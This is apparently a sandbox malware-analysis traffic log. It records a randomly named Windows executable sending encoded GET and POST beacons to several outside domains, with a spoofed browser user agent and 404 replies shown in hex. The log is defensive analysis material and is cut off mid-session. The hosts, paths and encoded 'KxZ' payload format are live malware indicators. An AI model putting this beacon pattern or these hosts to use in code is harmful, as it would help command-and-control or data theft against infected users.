                                                                    Data Ascii: KxZ=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifnNsGB+V4AQ2dArbWpQd9HWn/nxE7uFbLFqbNMoDALfjPF534FoEL+Xu1vrRvp+QX8C8sM9SwSjGsflvfQCuO1GeJGgubwmTYqpxRmYlU2oArAAi6/fg480vvEoXNqbITXI1hOfHvMAsRKR0cnduOC+1O1LsjAIqO3eleQ5rfyaimp12LzLzb/Q6J8Tdp8xNo9UCqiQgQHh8k1azwp6C4CvfDWdg5rZYXSG9UBTsj3lqgWlY63wrP+W5pcTjtPCM79XoeNgCuu7/VkEw/+xTh93roV6hV2XOIgTwiYe40TtHYdxSjC2TATlonbiJRg+SCQ/PAF/AGOaxQ45D2qwug3msYWelXP39+ws7CBnKaew79Ybh9mxwJIp4aOcQY0l0/6NijHwpj6iuoBENTe8Rfzc/VM8mKG95omg0lqzkxcBdsV3yHijIzU/UmIQCYG4rMPgWhDALOpMQeePPSxpXsmN5GjmpTpjflEzl1vrd/1vI+Ey3UxJM99yDpngYj35ZuCqaDRC9Aagb+IQhRyQ4+T88yDoVshbQEzGLNDN0HsxuB6bxSpCrKZtlAtU811dODO6QvIK7z1k/0cSYrdMR+891P+vRkUK2rLGz4/OhcYNsNe05h5oAXue6yq5L1O8LuOba9eXmAh7FwCZLZyBgcuSNiiTFQGKVLBf06vtlg+g10sefNtb2GjKCyBJsv/QC+BsfwPEUzDXDbIDz3IJwPLm+/MPwg1ln07DIV8Hl4jnagetQStNbaVv4hYd8OspLsmQFc9sBIJTQ61YeZdQQnopv6Rt3kHKavgKT6IqjzsRb6v2hRbCf7OVSQAHsQ4V0qgMPsYmQ3Mm+MNDj0ldNy2NI5UBGanmEZoREKNnWwUE3r6TFMxfenM4LPoRQ3LkZKIe2NLemyzwe41Mhiqrmedcjd0rxt9xI1++dXOd7ZhiYsyYhfvvtkBpjv31OgwoTEaQrukL [TRUNCATED]
                                                                    Dec 6, 2024 10:06:10.392932892 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:10 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.649962206.238.89.119805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:11.637531042 CET590OUTGET /2mep/?T2M=Y0Z0G&KxZ=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk/wMyoJJMo2d1H/wS+I5dkctw90/UWWKH7Hql+RyzctUTqPRuvs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:13.136332989 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:12 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.64997766.29.149.46805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:18.690048933 CET866OUTPOST /cnve/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.infohive.website
                                                                    Referer: http://www.infohive.website/cnve/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6b 44 64 5a 65 30 37 36 5a 34 74 2b 51 70 44 6b 59 63 36 44 6a 72 36 32 49 56 4d 38 76 69 48 37 67 5a 51 52 52 57 52 53 54 66 65 4e 4d 52 68 55 61 58 48 6b 61 63 41 64 6f 6e 47 74 4a 76 56 61 36 73 4a 57 63 38 42 51 46 58 77 74 56 31 61 57 31 74 50 57 64 61 6f 39 4a 52 42 76 74 74 46 56 50 53 35 56 72 6e 65 76 6d 39 46 73 55 75 58 2b 78 62 33 76 69 6b 62 62 54 64 69 7a 31 6f 6b 71 4e 6e 76 68 58 76 4f 71 4e 51 55 52 4f 61 65 65 47 42 7a 33 4d 61 50 52 7a 76 4e 7a 30 46 57 34 72 65 49 65 75 37 67 75 53 73 4a 6f 57 41 43 76 57 74 56 5a 6b 78 45 34 36 76 51 39 30 42 6f 45
                                                                    Data Ascii: KxZ=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3MaPRzvNz0FW4reIeu7guSsJoWACvWtVZkxE46vQ90BoE
                                                                    Dec 6, 2024 10:06:19.912571907 CET637INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:19 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.64998566.29.149.46805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:21.360471964 CET890OUTPOST /cnve/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.infohive.website
                                                                    Referer: http://www.infohive.website/cnve/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 54 37 6e 37 49 52 51 54 39 53 55 66 65 4e 55 42 68 56 48 48 48 5a 61 63 4d 56 6f 6d 71 74 4a 76 42 61 36 70 74 57 63 50 35 50 58 33 77 76 64 56 61 55 2f 4e 50 57 64 61 6f 39 4a 52 56 4a 74 72 74 56 50 69 70 56 6b 6d 65 73 6c 39 46 6a 43 2b 58 2b 6d 72 33 6a 69 6b 61 4d 54 63 2f 6f 31 72 63 71 4e 6d 66 68 58 39 6d 70 44 51 56 59 54 4b 66 58 4f 55 43 64 50 4a 43 48 74 75 30 66 6f 6e 6e 54 6a 49 56 45 79 49 67 4e 41 38 70 71 57 43 61 64 57 4e 56 7a 6d 78 38 34 6f 34 63 61 37 31 4e 6e 68 4a 65 50 36 4b 37 42 37 4d 57 4d 46 77 5a 65 70 61 74 72 54 51 3d 3d
                                                                    Data Ascii: KxZ=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8pqWCadWNVzmx84o4ca71NnhJeP6K7B7MWMFwZepatrTQ==
                                                                    Dec 6, 2024 10:06:22.579344988 CET637INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:22 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.64999366.29.149.46805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:24.015970945 CET1903OUTPOST /cnve/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.infohive.website
                                                                    Referer: http://www.infohive.website/cnve/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 72 37 6e 49 41 52 52 77 6c 53 56 66 65 4e 4b 52 68 51 48 48 48 2b 61 66 38 52 6f 6e 58 61 4a 73 35 61 31 76 68 57 56 61 56 50 64 33 77 76 52 31 61 56 31 74 50 35 64 61 59 35 4a 52 46 4a 74 72 74 56 50 67 42 56 6a 33 65 73 6a 39 46 73 55 75 58 49 78 62 32 2b 69 6b 54 35 54 66 54 34 31 62 38 71 4f 46 33 68 57 4f 4f 70 50 51 56 57 51 4b 66 50 4f 55 47 47 50 4a 65 44 74 75 52 43 6f 6e 44 54 7a 4a 67 49 33 34 6f 4b 64 4e 52 30 50 69 4b 2b 61 34 68 34 6e 54 34 49 73 4a 41 56 77 47 52 76 34 76 4f 4a 78 38 43 37 7a 66 32 42 4c 48 41 5a 73 62 67 6e 48 4a 54 77 51 57 6b 2b 4a 6d 63 50 6b 51 50 77 32 39 48 78 46 38 36 38 67 6b 76 63 47 77 4d 62 6d 74 49 75 68 6c 64 4a 79 32 4c 73 44 6a 5a 55 6d 42 6f 66 78 43 33 4a 48 48 4e 70 53 6d 72 67 69 72 33 49 32 66 52 37 6c 34 57 77 4b 77 41 61 56 42 4d 35 77 44 43 74 32 62 30 62 79 53 4f 2f 50 39 77 62 78 45 4e 4a 30 70 65 61 46 62 [TRUNCATED]
                                                                    Data Ascii: KxZ=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQr7nIARRwlSVfeNKRhQHHH+af8RonXaJs5a1vhWVaVPd3wvR1aV1tP5daY5JRFJtrtVPgBVj3esj9FsUuXIxb2+ikT5TfT41b8qOF3hWOOpPQVWQKfPOUGGPJeDtuRConDTzJgI34oKdNR0PiK+a4h4nT4IsJAVwGRv4vOJx8C7zf2BLHAZsbgnHJTwQWk+JmcPkQPw29HxF868gkvcGwMbmtIuhldJy2LsDjZUmBofxC3JHHNpSmrgir3I2fR7l4WwKwAaVBM5wDCt2b0bySO/P9wbxENJ0peaFbspy0OKcWpYMiOu7snH75of1zgBkjM0HqFYvtfAZo3XTV10WUdXULHThhINuFPissYQDBTMJDQ+kXWCuI0V2RAGSgJaC5kIWvRflz+SKp64wqpUs8drWru9NNJQJ5IWe7wrPRXOzC7ue/hEEsb9uqgXmM2l3vG0Q0BClY9u3MadLjJHUn0db6ca/ZLo34L0NAPhlCHbznJ8gI7VzS8y1oQ7UP9RwKr7tvjgNq7ELFJkm3TNUnVb2f86fWkbdDcF//+vxCmSDvz3EmknrD+dquLXLXBhMMfCvUgXGnuHREsI2ok2Rq8kjQD25AjxeMcn/nM/c5Vupnfu3NRdBG/Lny4X3fYMIu4/MQaxDyf6NHKsVSrnin6waw810W+9mtxDod2v+2McR9FDozm2i2eTtOYfJUVxlFyjUsYX5DQLnuXl6TeqXS/YKXrdR2MmFTgHYxGlipZ2Se1sMIHEdpngZEEF6kUkMklcxkdrdJI3rV1z/2MCaXTPxuM0BRMWcg2Y7rH13GlV+CKoo4qqxadZ20UabXmZnjZVgQq75X84ZMJdq0UfMHcDVJLPtA03zmoqYXb+MUmOzjfN7yuWD/25mgswVbWyefDjDXl3qN1yWA+0t8saYh5GTtnexFQ6X0ObccUe/i9kClJVYEaQPlf5HbpvvzbJYJlnzzdl [TRUNCATED]
                                                                    Dec 6, 2024 10:06:25.230676889 CET637INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:25 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.64999966.29.149.46805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:26.670553923 CET596OUTGET /cnve/?KxZ=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVY2k1UguS5MLScqsLEwQyiaZDJDNhiwSLktxebIPhr8mPgUz4eag=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:27.894550085 CET652INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:27 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.650016217.70.184.50805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:06:33.789685965 CET854OUTPOST /ead0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sunnyz.store
                                                                    Referer: http://www.sunnyz.store/ead0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
